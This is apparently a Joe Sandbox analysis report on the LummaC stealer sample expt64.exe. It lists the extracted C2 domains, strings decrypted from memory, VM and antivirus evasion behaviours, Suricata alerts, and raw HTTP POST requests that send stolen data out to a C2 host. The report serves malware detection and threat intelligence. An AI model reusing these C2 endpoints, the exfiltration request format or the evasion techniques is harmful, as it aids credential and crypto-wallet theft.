Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
expt64.exe

Overview

General Information

Sample name:expt64.exe
Analysis ID:1587438
MD5:c4cb62a984955f3ad185c1b289d816d9
SHA1:afaa3f895bc307c7dc41f9641a5c757a82e0c5fb
SHA256:a42ce4178e7dc0be9b8f8b91ef4af38e05c66c587b7ae80840cc60f45051d773
Tags:AdwareGenericexeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected potential unwanted application
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • expt64.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\expt64.exe" MD5: C4CB62A984955F3AD185C1B289D816D9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "manyrestro.lat", "talkynicer.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat", "brendon-sharjen.biz"], "Build id": "HpOoIh--3fe7f419a360"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x4d8b8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x50e4e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Process Memory Space: expt64.exe PID: 6988JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: expt64.exe PID: 6988JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 2 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:20.299112+010020283713Unknown Traffic192.168.2.1249715104.102.49.254443TCP
              2025-01-10T11:36:21.414391+010020283713Unknown Traffic192.168.2.1249716104.21.64.1443TCP
              2025-01-10T11:36:22.439288+010020283713Unknown Traffic192.168.2.1249717104.21.64.1443TCP
              2025-01-10T11:36:23.858172+010020283713Unknown Traffic192.168.2.1249719104.21.64.1443TCP
              2025-01-10T11:36:25.272889+010020283713Unknown Traffic192.168.2.1249722104.21.64.1443TCP
              2025-01-10T11:36:26.645648+010020283713Unknown Traffic192.168.2.1249724104.21.64.1443TCP
              2025-01-10T11:36:28.057227+010020283713Unknown Traffic192.168.2.1249725104.21.64.1443TCP
              2025-01-10T11:36:29.027636+010020283713Unknown Traffic192.168.2.1249727104.21.64.1443TCP
              2025-01-10T11:36:30.372212+010020283713Unknown Traffic192.168.2.1249728104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:21.874704+010020546531A Network Trojan was detected192.168.2.1249716104.21.64.1443TCP
              2025-01-10T11:36:22.914361+010020546531A Network Trojan was detected192.168.2.1249717104.21.64.1443TCP
              2025-01-10T11:36:30.829987+010020546531A Network Trojan was detected192.168.2.1249728104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:21.874704+010020498361A Network Trojan was detected192.168.2.1249716104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:22.914361+010020498121A Network Trojan was detected192.168.2.1249717104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.624899+010020584801Domain Observed Used for C2 Detected192.168.2.12507471.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.519203+010020580391Domain Observed Used for C2 Detected192.168.2.12563501.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.596381+010020584841Domain Observed Used for C2 Detected192.168.2.12494191.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.558399+010020584921Domain Observed Used for C2 Detected192.168.2.12542811.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.573166+010020585001Domain Observed Used for C2 Detected192.168.2.12531221.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.543790+010020585021Domain Observed Used for C2 Detected192.168.2.12562651.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.584352+010020585101Domain Observed Used for C2 Detected192.168.2.12563781.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.610905+010020585121Domain Observed Used for C2 Detected192.168.2.12524791.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:19.532991+010020585141Domain Observed Used for C2 Detected192.168.2.12645901.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:28.492586+010020480941Malware Command and Control Activity Detected192.168.2.1249725104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:36:20.782904+010028586661Domain Observed Used for C2 Detected192.168.2.1249715104.102.49.254443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://wordyfindy.lat/apiM:Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/tAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apijOgAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiingAvira URL Cloud: Label: malware
              Source: brendon-sharjen.bizAvira URL Cloud: Label: malware
              Source: expt64.exe.6988.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "manyrestro.lat", "talkynicer.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat", "brendon-sharjen.biz"], "Build id": "HpOoIh--3fe7f419a360"}
              Source: expt64.exeReversingLabs: Detection: 65%
              Source: expt64.exeVirustotal: Detection: 72%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: brendon-sharjen.biz
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--3fe7f419a360
              Source: expt64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49728 version: TLS 1.2
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0231D26D
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h0_2_0231A2A5
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+esi*2]0_2_02330287
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+esi*2]0_2_02330263
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ebx, word ptr [esi]0_2_022FC2DC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h0_2_0232D2CC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]0_2_022FE36E
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0230B35C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_0230B35C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]0_2_0230B35C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]0_2_023183BC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0232F3ED
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then add eax, 10h0_2_0230B029
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]0_2_0231F012
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h0_2_0233207C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]0_2_0231A056
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]0_2_0232A0EC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_0230D155
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h0_2_023311AC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h0_2_0230819C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]0_2_0231719C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]0_2_022FE6A1
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then push eax0_2_0232F68A
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov dword ptr [edi], 60296828h0_2_02316730
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edi, word ptr [ecx]0_2_0230D7BB
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0231D7A3
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]0_2_023307CB
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [ebx+eax*2]0_2_023167CF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]0_2_0231B461
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0231244C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]0_2_022FF4B7
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]0_2_023304EF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah0_2_0233153C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah0_2_0233153C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]0_2_023305EC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then add ecx, edi0_2_0231CA3B
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0231AA7A
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h0_2_02330A6C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]0_2_02309A4D
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then lea eax, dword ptr [esi+00003763h]0_2_022FDAB7
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h0_2_02331AEC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then lea ecx, dword ptr [eax+00000960h]0_2_0230DB3E
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2]0_2_0232EB05
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h0_2_02330B7C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02313B6C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [ecx]0_2_02316B6C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then lea edx, dword ptr [eax-00001099h]0_2_0232CBFC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h0_2_0231ABDD
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]0_2_0232E81C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_022FA87C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0231D867
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0231D8B2
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h0_2_023078B8
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0231388C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0232688C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0231D8C9
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h0_2_0233192C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h0_2_02307978
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h0_2_023179BA
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h0_2_023179BC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0231B9AC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0230AE33
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_022F8E3C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_022F8E3C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh0_2_02331E2C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]0_2_0232CE7C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h0_2_02330E7C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov dword ptr [esp+04h], ebx0_2_0231CEB8
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h0_2_02331EFC
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then mov byte ptr [esi+ecx], dl0_2_022FBF13
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then jmp edi0_2_022FBF5F
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then lea ecx, dword ptr [eax+000071B9h]0_2_02317F4C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then lea ecx, dword ptr [eax-000037DBh]0_2_022FAF9C
              Source: C:\Users\user\Desktop\expt64.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]0_2_022FBCD2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz) : 192.168.2.12:56350 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.12:56265 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.12:50747 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.12:49419 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.12:64590 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.12:56378 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.12:53122 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.12:52479 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.12:54281 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.12:49715 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49716 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49716 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49725 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49728 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49717 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49717 -> 104.21.64.1:443
              Source: Malware configuration extractorURLs: shapestickyr.lat
              Source: Malware configuration extractorURLs: slipperyloo.lat
              Source: Malware configuration extractorURLs: wordyfindy.lat
              Source: Malware configuration extractorURLs: manyrestro.lat
              Source: Malware configuration extractorURLs: talkynicer.lat
              Source: Malware configuration extractorURLs: curverpluch.lat
              Source: Malware configuration extractorURLs: bashfulacid.lat
              Source: Malware configuration extractorURLs: tentabatte.lat
              Source: Malware configuration extractorURLs: brendon-sharjen.biz
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49716 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49724 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49725 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49719 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49728 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49727 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49717 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49715 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49722 -> 104.21.64.1:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WAVL3SHFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12784Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1K58B3BFUNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15031Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LCECPHTHGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20206Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=075K4N27BXNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZIOL9PUC4FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1065Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
